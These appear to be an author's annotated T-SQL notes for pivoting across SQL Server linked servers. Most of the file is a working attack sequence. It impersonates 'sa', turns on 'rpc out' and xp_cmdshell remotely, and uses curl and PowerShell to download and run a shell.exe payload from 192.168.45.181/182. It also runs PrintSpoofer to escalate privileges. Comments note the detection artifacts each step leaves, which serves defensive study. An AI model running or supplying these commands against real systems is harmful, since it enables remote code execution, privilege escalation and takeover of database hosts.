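-- Linked-server pivot sequence (author's working notes, kept in order).
-- The original used '#' as the comment marker, which T-SQL does not recognise,
-- so the file did not parse; markers are '--' here. Statements are unchanged.
-- Each step is annotated with the permission it relies on and what it leaves
-- behind for a defender to see.

-- Local instance: does the current login hold sysadmin?
SELECT is_srvrolemember('sysadmin');

-- If a linked server exists but the remote side shows no mapping, list the
-- local-login -> remote-login mappings first.
EXEC sp_helplinkedsrvlogin; -- check mapping

-- Switch context to the mapped login. Requires IMPERSONATE on that login
-- (sysadmin holds it implicitly). ORIGINAL_LOGIN() still reports the real
-- caller, so audits keyed on it see through the impersonation.
EXECUTE AS LOGIN = 'sa'; -- login as that mapped user

-- If 'rpc out' is off, EXEC (...) AT <server> fails. Enabling it is a
-- server-level change (sp_serveroption needs ALTER ANY LINKED SERVER) and is
-- visible afterwards in sys.servers.is_rpc_out_enabled -- worth alerting on.
exec sp_serveroption @server='SQL03', @optname='rpc out', @optvalue='TRUE';

------
EXEC sp_linkedservers; -- enumerate linked servers

-- Who the remote side thinks we are: the server login and the database user
-- that the login mapping resolves to.
EXEC ('SELECT SYSTEM_USER;') AT sql27;
EXEC ('SELECT USER_NAME();') AT sql27;

-- Enable xp_cmdshell on the remote instance. Both sp_configure changes need
-- ALTER SETTINGS on the remote, are recorded in the remote SQL Server error
-- log ("Configuration option ... changed from 0 to 1"), and show in
-- sys.configurations; a baseline check on that view catches this step.
EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT sql27;
EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT sql27;
-- OS commands run under the remote service account, or the xp_cmdshell proxy
-- account where one is configured. Every command below is a child process of
-- sqlservr.exe, which is the high-signal event for endpoint detection.
EXEC ('xp_cmdshell ''whoami'';') AT sql27;

-- Fetch and run a binary on sql03. The outbound HTTP request from the database
-- host and a new executable under C:\windows\tasks are the observable artifacts.
EXEC ('xp_cmdshell "curl 192.168.45.181/shell.exe > C:/windows/tasks/shell.exe";') AT sql03;
EXEC ('xp_cmdshell "C:/windows/tasks/shell.exe";') AT sql03;

----
-- Second stage on sql03: same download-and-execute pattern, with the first
-- binary passed as an argument to the second.
EXEC ('xp_cmdshell "curl 192.168.45.181/PrintSpoofer64.exe > C:/windows/tasks/ps.exe";') AT sql03;
EXEC ('xp_cmdshell "C:/windows/tasks/ps.exe -c C:/windows/tasks/shell.exe";') AT sql03;

----
-- Same pattern on sql27 via PowerShell. Note the string literal spans two
-- lines exactly as the author wrote it; it is reproduced unchanged here.
EXEC ('xp_cmdshell "
powershell -c IWR -Uri http://192.168.45.182/shell.exe -OutFile C:\users\public\downloads\shell.exe";') AT sql27;
EXEC ('xp_cmdshell "C:\users\public\downloads\shell.exe";') AT sql27;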